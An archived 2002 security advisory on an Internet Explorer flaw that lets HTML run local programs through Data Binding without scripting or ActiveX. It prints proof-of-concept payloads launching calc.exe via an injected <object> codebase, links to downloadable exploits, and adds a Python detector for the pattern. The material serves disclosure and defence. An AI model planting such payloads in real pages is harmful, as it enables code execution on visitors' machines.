1st Mar 2002 [SBWID-5159]
COMMAND
IE arbitrary commands exec without Active Scripting or ActiveX
SYSTEMS AFFECTED
IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.
PROBLEM
From the GreyMagic [http://security.greymagic.com] advisory [GM#001-IE]:
--snipp--
All \"createPopup\" does is create a (featureless) window containing an
empty HTML document, this does not pose a threat, but later on, that
document has HTML injected to it (using innerHTML), which is the actual
problem. For example, the following code will work just the same:
<span id=\"oSpan\"></span>
<script language=\"jscript\" defer>
oSpan.innerHTML=\'<object classid=\"clsid:11111111-1111-1111-1111-111111111111\" codebase=\"c:/winnt/system32/calc.exe\"></object>\';
</script>
(Note: innerHTML is not the only property used to dynamically insert
HTML to any element, it is also possible to use outerHTML,
insertAdjacentHTML and more to gain the same results.)
Data Binding binds HTML elements (data consumers) such as div or span
to the DSO without need for a single line of script code. We found out
that when the \"dataFormatAs\" attribute is set to \"HTML\" on the
consumer, Data Binding internally uses innerHTML in order to insert the
data into the element (otherwise innerText is used). So all we need to
do now is supply a DSO that contains the offending <object> element,
the rest will be done for us by the Data Binding engine, no scripting
needed.
--snapp--
Exploit :
=======
In the following example we're using an XML data-island as our DSO and
a span element as the data consumer. Using XML is especially
comfortable because it can be embedded within the document, without
need for external requests that may be stopped by the host application.
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
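As an added example (not part of the original advisory or GreyMagic's code), the following Python scanner flags the pattern described above for content inspection: a data consumer with dataFormatAs="HTML" bound to an in-page XML island whose body carries an <object> with a codebase attribute. The two sample documents, the CLSID and the path are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample reproducing the advisory's pattern (CLSID and path are illustrative).
BOUND_HTML = """<html><body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object classid="clsid:11111111-1111-1111-1111-111111111111"
        codebase="c:/winnt/system32/calc.exe"></object>
]]></exploit></security></xml></body></html>"""

# Constructed benign binding: plain-text consumer (innerText path), no <object> in the island.
BENIGN_HTML = """<html><body>
<span datasrc="#oNames" datafld="name"></span>
<xml id="oNames"><rows><row><name>Alice</name></row></rows></xml></body></html>"""

# Island bodies are matched on the raw text, so CDATA handling differences in html.parser do not matter.
ISLAND_RE = re.compile(r'<xml\b[^>]*\bid\s*=\s*["\']?([\w-]+)["\']?[^>]*>(.*?)</xml>', re.I | re.S)
OBJECT_RE = re.compile(r'<object\b[^>]*\bcodebase\s*=\s*["\']?([^"\'\s>]+)', re.I | re.S)

class _ConsumerCollector(HTMLParser):
    """Collects elements bound to an in-page DSO with dataFormatAs=HTML (the innerHTML path)."""

    def __init__(self):
        super().__init__()
        self.consumers = []  # (tag, island id, datafld)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("dataformatas", "").lower() == "html" and a.get("datasrc", "").startswith("#"):
            self.consumers.append((tag, a["datasrc"][1:], a.get("datafld", "")))

def find_html_binding_objects(html):
    """Return one finding per <object codebase=...> reachable through an HTML-formatted binding."""
    collector = _ConsumerCollector()
    collector.feed(html)
    collector.close()
    islands = {m.group(1): m.group(2) for m in ISLAND_RE.finditer(html)}
    findings = []
    for tag, island_id, field in collector.consumers:
        body = islands.get(island_id)
        if body is None:
            continue  # DSO is not an inline XML island; out of scope for an offline check
        for m in OBJECT_RE.finditer(body):
            findings.append({"consumer": tag, "island": island_id,
                             "field": field, "codebase": m.group(1)})
    return findings
```

A consumer whose datasrc points at an external DSO is skipped here; a gateway that can fetch the referenced data source would apply the same OBJECT_RE check to what it returns.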
UUencoded exploits (IEexec.zip): see [http://security.greymagic.com/adv/gm001-ie/].
SOLUTION
Use Microsoft's latest patch ??